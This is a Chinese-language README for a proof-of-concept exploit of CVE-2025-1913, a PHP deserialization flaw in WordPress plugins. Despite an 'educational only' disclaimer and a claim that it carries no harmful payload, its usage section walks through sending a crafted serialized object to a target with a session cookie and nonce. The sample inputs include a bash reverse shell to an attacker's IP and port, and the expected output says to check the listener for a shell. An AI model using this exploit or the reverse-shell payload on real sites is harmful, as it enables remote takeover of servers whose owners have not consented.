此仓库包含仅用于教育目的的 CVE-2025-1913 概念验证 (PoC),由 Suhaib518 🇸🇦 创建。 该 PoC 演示了精心构造的 PHP 序列化输入如何在受影响的 WordPress 组件中触发易受攻击的逻辑。 该 PoC 是安全的,并且不包含有害载荷。
⚠️ 免责声明: 此 PoC 仅用于学习、研究和防御性安全测试。 请勿将其用于您不拥有或无明确权限进行测试的服务器。
该漏洞存在于某些 WordPress 插件工作流中对 PHP 序列化数据的不安全处理中。 此 PoC 展示了攻击者如何提供精心构造的序列化结构,从而引发意外的内部行为。
此仓库包含一个 Python 脚本,它可以:
.
├── CVE-2025-1913-PoC.py # 由 Suhaib518 KSA 创建的 PoC 脚本
└── README.md # 文档
该脚本仅使用内置 Python 模块,除了 requests:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
您将被询问:
然后脚本将序列化它们,构建一个 WordPress 请求并发送。
下面是一个示例命令,演示了如何使用示例值(这些值不是恶意的,仅展示流程):
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
交互式问题的示例回答:
[?] 这个类有多少个属性? 2
[?] 属性 #1 的名称: file
[?] 'file' 的值: shell.sh
[?] 属性 #2 的名称: shell
[?] 'shell' 的值: sh -i >& /dev/tcp/IP/PORT 0>&1
然后脚本将输出:
[*] 发送请求...
....检查监听器以获取 shell。
unserialize()MIT 许可证。
由 Suhaib518 🇸🇦 创建。